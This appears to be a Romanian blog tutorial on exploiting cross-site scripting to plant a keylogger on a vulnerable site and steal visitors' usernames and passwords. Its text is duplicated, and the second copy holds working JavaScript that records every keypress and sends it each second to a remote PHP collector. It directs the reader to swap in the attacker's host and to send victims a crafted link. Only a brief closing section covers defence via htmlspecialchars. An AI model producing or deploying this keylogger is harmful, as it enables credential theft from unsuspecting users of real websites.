Introductie
XSS este una din cele mai intalnite vulnerabilitati web, atacurile XSS sunt de obicei ignorate de administratorii care nu stiu in cat de multe moduri se poate exploata aceasta vulnerabilitate.
In acest tutorial va voi explica cum sa faceti un keylogger pe un site vulnerabil.
In cele mai multe cazuri, atacatorul fura cookieul victimei pentru ii accesa contul fara un username sau o parola.
Acum imaginati-va ca atacatorul are nevoie sa faca rost de usernameul sau parola victimei, pentru cauze ce nu trebuie explicate, in acest caz trebuie capturata fiecare tasta ce a fost scrisa pe pagina de login.
Javascript Keylogger
Codul de mai jos este un keylogger Javascript, el captureaza toate cuvintele scrise pe o pagina si le trimite remote unui script PHP odata la cateva secunde.
Schimbati localhost cu cu hostnameul serverului si locatia specifica.
PHP Grabber
Codul de mai jos va primi si salva toate datele trimise de catre keylogger.
Exploatare
Acum atacatorul are ambele fisiere keylogger.php si keylogger.js pe un remote host.
El va trebui sa creeze un link infectat, precum acesta:
Atacatorul poate trimite linkurile ca acesta victimei, daca victima nu observa URI-ul ciudat si se logheaza cu usernameul si parola, datele vor fi salvate in fisierul 'data.txt' pe serverul remote al atacatorului.
Protejare
Exista mai multe solutii pentru a fixa un cod vulnerabil la XSS.
Asta a fost tot legat de subiectul xss keylogging, multumesc pentru ca ati citit.
XSS este una din cele mai intalnite vulnerabilitati web, atacurile XSS sunt de obicei ignorate de administratorii care nu stiu in cat de multe moduri se poate exploata aceasta vulnerabilitate.
In acest tutorial va voi explica cum sa faceti un keylogger pe un site vulnerabil.
In cele mai multe cazuri, atacatorul fura cookieul victimei pentru ii accesa contul fara un username sau o parola.
Acum imaginati-va ca atacatorul are nevoie sa faca rost de usernameul sau parola victimei, pentru cauze ce nu trebuie explicate, in acest caz trebuie capturata fiecare tasta ce a fost scrisa pe pagina de login.
Javascript Keylogger
Codul de mai jos este un keylogger Javascript, el captureaza toate cuvintele scrise pe o pagina si le trimite remote unui script PHP odata la cateva secunde.
Schimbati localhost cu cu hostnameul serverului si locatia specifica.
Code:
var keys='';
document.onkeypress = function(e) {
get = window.event?event:e;
key = get.keyCode?get.keyCode:get.charCode;
key = String.fromCharCode(key);
keys+=key;
}
window.setInterval(function(){
new Image().src = 'http://localhost/demo/keylogger.php?c='+keys;
keys = '';
}, 1000);
Codul de mai jos va primi si salva toate datele trimise de catre keylogger.
Code:
Acum atacatorul are ambele fisiere keylogger.php si keylogger.js pe un remote host.
El va trebui sa creeze un link infectat, precum acesta:
HTML Code:
http://target/path/vulnpage.php?article=9
Protejare
Exista mai multe solutii pentru a fixa un cod vulnerabil la XSS.
- Folositi-va de functia PHP htmlspecialchars(), care previne folosirea de caractere precum < ' / etc , transformandu-le in coduri html nefolositoare.
- Nu trimiteti direct niciodata o variabila GET/POST/COOKIE, prin care atacatorul poate injecta coduri in pagina.
Asta a fost tot legat de subiectul xss keylogging, multumesc pentru ca ati citit.
Niciun comentariu:
Trimiteți un comentariu